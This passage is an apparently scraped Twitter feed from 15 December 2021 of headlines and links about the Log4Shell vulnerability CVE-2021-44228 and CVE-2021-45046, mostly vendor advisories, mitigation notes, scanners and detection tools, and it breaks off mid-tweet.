2021-12-15 16:59:09JMeter 5.4.1 fix for Security CVE-2021-44228 issue https://t.co/nRMDnSDV5i In case you installed on Windows, JMeter… https://t.co/s2gIU8XzX9 https://dev.to/sebiboga/jmeter-541-fix-for-security-cve-2021-44228-issue-4joc https://twitter.com/i/web/status/1471159490414186497M157q_News_RSS
2021-12-15 16:47:06"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeVMy9 Via @PandoraFMS cc @sjvn . https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-15 16:46:43JMeter 5.4.1 fix for Security CVE-2021-44228 issue: https://t.co/MfYO1M4d4H https://dev.to/sebiboga/jmeter-541-fix-for-security-cve-2021-44228-issue-4jocMathieuPiton
2021-12-15 16:44:48CVE - CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in… https://t.co/wcptfLuEZw https://twitter.com/i/web/status/1471156155871383559SecRecon
2021-12-15 16:43:33Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec… https://t.co/YYkp4nS3vG https://twitter.com/i/web/status/1471156566795689988RProgramming150
2021-12-15 16:40:39JMeter 5.4.1 fix for Security CVE-2021-44228 issue https://t.co/Cdo6IEOfmK https://dev.to/sebiboga/jmeter-541-fix-for-security-cve-2021-44228-issue-4jocfeedpushr
2021-12-15 16:36:05An aggregation of scanning tools and other interesting work the Internet has produced around CVE-2021-44228 can be… https://t.co/N99ClSf1k9 https://twitter.com/i/web/status/1471153292071739392packet_storm
2021-12-15 16:33:532021年12月14日のTHNの記事。 CVE-2021-44228 に続くDoS脆弱性で、CVSS値も3.7くらい。正直、RCEでなくてよかったとしか思ってない(もしRCEだったら、振り出しに)。/ Second Log4j V… https://t.co/ngqk4ZoERz https://twitter.com/i/web/status/1471154038993727488wakatono
2021-12-15 16:33:35Ivanti's response to the #Apache #Log4J Vulnerability #CVE-2021-44228. Sign-in for further updates at:… https://t.co/p4zshIcXqU https://twitter.com/i/web/status/1471150570849320966GoIvanti
2021-12-15 16:33:18A new Cybersecurity vulnerability called CVE-2021-44228 that affects #log4j which runs on billions of applications… https://t.co/RvAkB8mGQ5 https://twitter.com/i/web/status/1471154352798765057BlaqCat9
2021-12-15 16:32:29Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability https://t.co/64cVlc9xyM This is why y… https://t.co/b2d0ilMl1t https://virtuallyandy.wordpress.com/2021/12/14/using-nsx-ids-ips-to-protect-against-cve-2021-44228-log4shell-vulnerability/ https://twitter.com/i/web/status/1471151018306060291dcd270
2021-12-15 16:31:52#log4j Vulnerability : CVE-2021-44228 @TheHackersNews #cybersecuritytips #bugbounty #Pentesting https://t.co/ZVqQVl4Bfg https://github.com/fox-it/log4j-finderkavishdefensive
2021-12-15 16:30:34SECURITY ADVISORY- Umbraco CMS and Cloud NOT affected by CVE-2021-44228 - Log4j RCE 0-day mitigation, by Filip Bech… https://t.co/dF3NeOEkkn https://twitter.com/i/web/status/14711518161128898573p_ar
2021-12-15 16:29:55Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability https://t.co/IlVOK11fZY https://dy.si/5jKCkfverdugo_vmware
2021-12-15 16:29:03もしかしてCVE-2021-44228の影響で大規模攻撃でもしてネットワーク障害発生してる?bagakoHeartsong
2021-12-15 16:28:51How To Detect the Log4Shell Vulnerability (CVE-2021-44228) with Microsoft Endpoint Configuration Manager… https://t.co/2oSOheEooX https://twitter.com/i/web/status/1471152079259545610Hoorge
2021-12-15 16:24:42更新:Apache Log4j の脆弱性対策について(CVE-2021-44228) https://t.co/zrz3fZvcXJ https://www.ipa.go.jp/security/ciadr/vul/alert20211213.htmlzimei_no_ri
2021-12-15 16:23:18🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/MYFJE9GmZE https://twitter.com/i/web/status/1471152961342562312threatintelctr
2021-12-15 16:22:14🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in conf… https://t.co/9CUZguAB5q https://twitter.com/i/web/status/1471152961455853571threatintelctr
2021-12-15 16:14:09HP Apache Software Log4j v2. - Security Vulnerability CVE-2021-44228. Topic: https://t.co/PsZG0VEwyH Public Vulne… https://t.co/M6FQzEFgiO https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=a00120086en_us https://twitter.com/i/web/status/1471149658735063048peterpan2000355
2021-12-15 16:13:16#VMware #Security #VirtualCloudNetwork - Using #NSX IDS/IPS to #protect #against CVE-2021-44228 #Log4Shell Vulnerab… https://t.co/lUoEjep6qK https://twitter.com/i/web/status/1471149805858529284WaldemarPera
2021-12-15 16:11:36Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/gygvZzOVnV https://dy.si/1DTsE42vDMehringer
2021-12-15 16:11:11"With the attention CVE-2021-44228 has received, I wouldn’t be surprised if we saw a third CVE related to #Log4j2,"… https://t.co/3cfbqZ7Piu https://twitter.com/i/web/status/1471143280943394822valtixinc
2021-12-15 16:11:09CYBERSECURITY ADVISORY: Log4Shell - Log4j Vulnerability (CVE-2021-44228) This vulnerability is currently being exp… https://t.co/1nBFd9TGUw https://twitter.com/i/web/status/1471150366817492993ingallsinfosec
2021-12-15 16:10:43この件って思ったよりでかくなってきてるな。うちのサポートにも来てたし。 CVE-2021-44228 Log4jの脆弱性のAWS環境への影響 https://t.co/lghXdzjQR4 #Qiita @tsukamotoから https://qiita.com/tsukamoto/items/858f2bb863e75d4225c4syusseki_card
2021-12-15 16:10:18Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued https://t.co/hp89kTm1SG https://bit.ly/3pSwiPiMMShippy
2021-12-15 16:09:51もしかしてCVE-2021-44228の影響で大規模攻撃でもしてネットワーク障害発生してる?bagakoHeartsong
2021-12-15 16:08:59GitHub - darkarnium/Log4j-CVE-Detect: Detections for CVE-2021-44228 inside of nested binaries https://t.co/ruKFUWtTt0 https://j.mp/3GLsTsrPatrickCMiller
2021-12-15 16:08:47IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community · GitHub #infosec https://t.co/82iI6ErmnP https://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166cfgregory
2021-12-15 16:08:34The @securelist team take a deep-dive into the CVE-2021-44228 vulnerability in Apache #Log4j library. Read now 👇 https://t.co/rTQbY9o6Mq https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/?utm_source=twitter&utm_medium=social&utm_campaign=uk_securelist_db0077&utm_content=sm-post&utm_term=uk_twitter_organic_77yo7zyphdorbjukaspersky
2021-12-15 16:07:57There is a new update on the situation regarding #ArcGIS and CVE-2021-44228 Apache Log4j 2. Please refer to Esri’s… https://t.co/y2G7bLw9xV https://twitter.com/i/web/status/1471146163420209152EsriIreland
2021-12-15 16:06:49We have released a #Log4Shell CVE-2021-44228 dashboard to help our customers identify the related IOCs and affected… https://t.co/c0IO31ikdD https://twitter.com/i/web/status/1471146482409562112Silobreaker
2021-12-15 16:05:54GitHub’s response to Log4j vulnerability CVE-2021-44228 https://t.co/Neymk1NLhZ https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/Cyberboss_JHCB
2021-12-15 16:03:55CVE-2021-44228 Stories: Vendor/Internal Teams: We're safe, we are on Log4J v1! https://t.co/fNqkpNSIHF https://twitter.com/Jim_Kittle/status/856701223059296256Jim_Kittle
2021-12-15 16:02:43うろ鯖脆弱性(CVE-2021-44228)対応報告書 | Urouro Server https://t.co/KmHvYNQVDY https://urosaba.com/2021/12/13/report-for-urouro-server-vulns-cve-2021-44228/wakokara
2021-12-15 16:01:13I have disclosed a new vulnerability on log4j2 (even after CVE-2021-44228): https://t.co/KJKKUf4Xgy Dropping on T… https://t.co/NsZLsVK9qt https://github.com/apache/logging-log4j2/pull/630 https://twitter.com/i/web/status/1471147929415176200fulldecent
2021-12-15 16:00:36@ArmorDba #sqlhelp CVE-2021-44228 Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Appl… https://t.co/bAfelEl2eU https://twitter.com/i/web/status/1471148027335303176SqlWorldWide
2021-12-15 15:56:57Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 https://t.co/EBToTOD1Vr https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/kalyankrishna1
2021-12-15 15:56:39An update on the Apache Log4j CVE-2021-44228 vulnerability - #IBM is actively responding to the reported remote cod… https://t.co/ys4WVgPNRb https://twitter.com/i/web/status/1471144410578571264flocalvez
2021-12-15 15:53:04Microsoft researchers have warned that the “CVE-2021-44228” flaw in the software Apache Log4j is being taken advant… https://t.co/Qm5EC7qX7i https://twitter.com/i/web/status/1471144554720079876IranIntl_En
2021-12-15 15:52:17Log4shell by the numbers- Why did CVE-2021-44228 set the Internet on Fire? #log4shell #log4j #CVE #ITSecurity… https://t.co/eiy57o0hHA https://twitter.com/i/web/status/1471145017842540544JGarz86
2021-12-15 15:46:47KCS is aware of CVE-2021-44228 that affects Java based software. It's critical that public facing servers are prote… https://t.co/BCKZHZgV3Q https://twitter.com/i/web/status/1471141105014124550KCSINFOTECH
2021-12-15 15:46:23If you have any questions or concerns about CVE-2021-44228 please do not hesitate to call or email us!KCSINFOTECH
2021-12-15 15:46:12All the known softwares and framework or SaaS that are concerned by the CVE-2021-44228 or CVE-2021-45046… https://t.co/4qp8CrqTdS https://twitter.com/i/web/status/1471141302263762955idriss_neumann
2021-12-15 15:46:02What is the @MITREattack technique for #log4j CVE-2021-44228? For Initial Access, we go with T1190 - Exploit Publi… https://t.co/Z4XPRFrKKo https://twitter.com/i/web/status/1471141326087495682jorgeorchilles
2021-12-15 15:45:44UPDATE (15-12-2021): La solución para CVE-2021-44228 (log4shell) provoca una vulnerabilidad de DOS en Apache Log4j… https://t.co/npxkjoNevV https://twitter.com/i/web/status/1471141414486618116Keplerlatam
2021-12-15 15:45:20Log4Shell-CVE-2021-44228 - https://t.co/tMzGXeQ94A #orclapex https://dietmaraust.com/log4shell-cve-2021-44228daust_de
2021-12-15 15:43:31As we continue to monitor threats taking advantage of the CVE-2021-44228 Log4j 2 vulnerability, we’re seeing activi… https://t.co/IPThaIRCE9 https://twitter.com/i/web/status/1471141937436667911DigitalEdwyn
2021-12-15 15:41:41Critical Log4Shell (Apache Log4j) Zero-Day Attack Analysis (CVE-2021-44228) https://t.co/GyI78mpn4L https://aeternusmalus.wordpress.com/2021/12/15/critical-log4shell-apache-log4j-zero-day-attack-analysis-cve-2021-44228/d34dr4bbit
2021-12-15 15:40:35Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/en7Cnz1Ftn https://dy.si/BpRTTmarcusomaridao
2021-12-15 15:39:45#Log4j 2.15.0 was to fix the severe RCE vulnerability, CVE-2021-44228 (#log4shell), in 2.14.1 and above. https://t.co/OOQGnpjbeW (2/5) https://www.cve.org/CVERecord?id=CVE-2021-44228scqrinc
2021-12-15 15:39:02Compared to the CVSS scores Apache published on recent #Log4j vulnerabilities, that of CVE-2021-44228 (#log4shell)… https://t.co/qy0kJNNNcJ https://twitter.com/i/web/status/1471137573141508097scqrinc
2021-12-15 15:35:03Zero-Day RCE Vulnerability (Log4j) CVE-2021-44228 Log4Shell Affects Java - do patch all your servers, apps, devices, browsers immediatelyLeonisLlp
2021-12-15 15:34:13log4j CVE-2021-44228-Scanner 1.5.0 released https://t.co/FUdx60UXSJ supporting deep nested JAR files and RAR files… https://t.co/YcZ3ASiTna https://github.com/logpresso/CVE-2021-44228-Scanner/ https://twitter.com/i/web/status/14711382986138746918con
2021-12-15 15:34:01Lof4j Vulnerability The recent zero-day exploit (CVE-2021-44228) is one that will likely go down in the history boo… https://t.co/rseDX4a8e9 https://twitter.com/i/web/status/1471138390351486982dlochkovic
2021-12-15 15:32:48CVE-2021-44228 が昨日あたりから、Log4Shell呼びに変わってきて、log4jとD4DJって似ているよねという味わいが薄れつつあるのが少し寂しい。alpaca_graying
2021-12-15 15:32:34Good morning, let’s defeat CVE-2021-44228😬syzygiess
2021-12-15 15:30:31New Log4j Vulnerability CVE-2021-44228: Info and Remediation https://t.co/NvSQeW9Ezn https://www.whitesourcesoftware.com/resources/blog/log4j-vulnerability-cve-2021-44228/fpientka
2021-12-15 15:30:24[CVE-2021-44228] Apache Log4j2 &lt;=2.14.1 https://t.co/Yf74pQHKO0nimelocuentes
2021-12-15 15:30:09Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation. Click on the link below fo… https://t.co/gAyP26JV14 https://twitter.com/i/web/status/1471140489931988995CoreGB
2021-12-15 15:23:37stopping throwing water CVE-2021-44228 CVE-2021-4104 CVE-2021-45046 https://t.co/u63O10J2xBgr00sg
2021-12-15 15:23:24All is well; we're not impacted by CVE-2021-44228, but if you're curious, here's some info: https://t.co/crncvxIS8S https://theforeman.org/2021/12/the-foreman-ecosystem-and-cve-2021-44228.htmlForemanProject
2021-12-15 15:23:14Linux botnets are leading the charge, taking advantage of critical remote code-execution flaw (CVE-2021-44228) in t… https://t.co/zrLYQWa432 https://twitter.com/i/web/status/1471136249557786624jeffespo
2021-12-15 15:21:58Info mt boa sobre o CVE-2021-44228, o zero day do log4j https://t.co/1yql2cUJ9d https://www.youtube.com/watch?v=7qoPDq41xhQreinaldorauch
2021-12-15 15:21:49New vulnerability, CVE 2021-45046, says the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was "incomplete in… https://t.co/ALG92rdrc6 https://twitter.com/i/web/status/1471137461204041728webhostingtalk
2021-12-15 15:21:36Are there r packages affected by the current log4j / CVE-2021-44228 security issue? #tidyverse #rstats https://t.co/FqhU1UPhLI https://stackoverflow.com/questions/70365900/are-there-r-packages-affected-by-the-current-log4j-cve-2021-44228-security-isstidyversetweets
2021-12-15 15:21:32It is easy for attackers to exploit CVE-2021-44228 (#log4shell) as it doesn't have hard requirements. On the contra… https://t.co/mw0Pneb4Oa https://twitter.com/i/web/status/1471137641416429569scqrinc
2021-12-15 15:11:35CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-15 15:11:08Walkthrough of Solar; the new @RealTryHackMe room by @_JohnHammond, investigating CVE-2021-44228 aka #log4j /… https://t.co/cjMseKAYeW https://twitter.com/i/web/status/1471133521091739651_CryptoCat
2021-12-15 15:10:27Are there any r packages affected by the current log4j / CVE-2021-44228 security issue? #tidyverse #RStats https://t.co/t9dgUqwdOj https://stackoverflow.com/q/70365900/2210479?stw=2AnneroseNisser
2021-12-15 15:10:15先週発表されたApache Log4jのクリティカルな脆弱性について、各ベンダサイトへのリンク集がGithubに上がっています。網羅性が高くていい感じです(CVE-2021-44228) https://t.co/HbRfo3CTjQ https://twitter.com/swithak/status/1469467786997121029infrataiyo
2021-12-15 15:10:06Apache Log4j-Sicherheitslücke CVE-2021-44228: Sind HCL Notes, Domino, Sametime, Connections usw. betroffen? https://t.co/mqET10Iq4y https://ift.tt/3pWcISAThomasBahn
2021-12-15 15:04:34#Log4j 2.15.0 was to fix the severe RCE vulnerability, CVE-2021-44228 (#log4shell), in 2.14.1 and above. https://t.co/OOQGnpjbeW https://www.cve.org/CVERecord?id=CVE-2021-44228scqrinc
2021-12-15 15:04:32Dealing with log4shell aka CVE-2021-44228 aka the log4j version 2 #cloudsecurity https://t.co/fyhlcxfcmo https://cloudsecurityalliance.org/articles/dealing-with-log4shell-aka-cve-2021-44228-aka-the-log4j-version-2/CLAVDIAmartin
2021-12-15 15:04:11Compared to the CVSS scores Apache published on recent #Log4j vulnerabilities, that of CVE-2021-44228 (#log4shell)… https://t.co/xewk5mY4Up https://twitter.com/i/web/status/1471125762379902979scqrinc
2021-12-15 15:04:02Looking forwards to the @Sophos webinar from @duckblog on Log4Shell and CVE-2021-44228rogredhat
2021-12-15 15:03:29It is easy for attackers to exploit CVE-2021-44228 (#log4shell) as it doesn't have hard requirements. On the contra… https://t.co/2IdE1vxOCC https://twitter.com/i/web/status/1471126418109071363scqrinc
2021-12-15 15:03:082021.12.15 Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/JMczYpVjtH https://t.co/6DGMOdUCNf https://www.intellilink.co.jp/column/vulner/2021/121500.aspxautumn_good_35
2021-12-15 15:02:58CVE-2021-44228 に加えてCVE-2021-45046 まで含めたNew Relicにおける取り組みとお客様にお願いしたい対応について本社記事を抄訳しました | Apache Log4j の脆弱性に関連する New… https://t.co/O5f7Eertps https://twitter.com/i/web/status/1471127323420561412NewRelicJapan
2021-12-15 15:02:02@NUKIB_CZ @Lupacz Chtelo by to rozsirit, fix CVE-2021-44228 nestaci... mame tu nove CVE-2021-45046... https://t.co/SDufaqUCTs https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/d4nys3k
2021-12-15 15:01:53#log4j CVE-2021-44228 CVE 2021-45046 new and complete document ⚠️✅https://t.co/Ffn4tdV2N9 #Mitigate and #Update #DFIR #IncidentResponse https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerabilityAcademicoCert
2021-12-15 15:01:29CVE-2021-44228 is so "12/14" #log4j2BobAmich
2021-12-15 15:00:49The vulnerability (CVE-2021-44228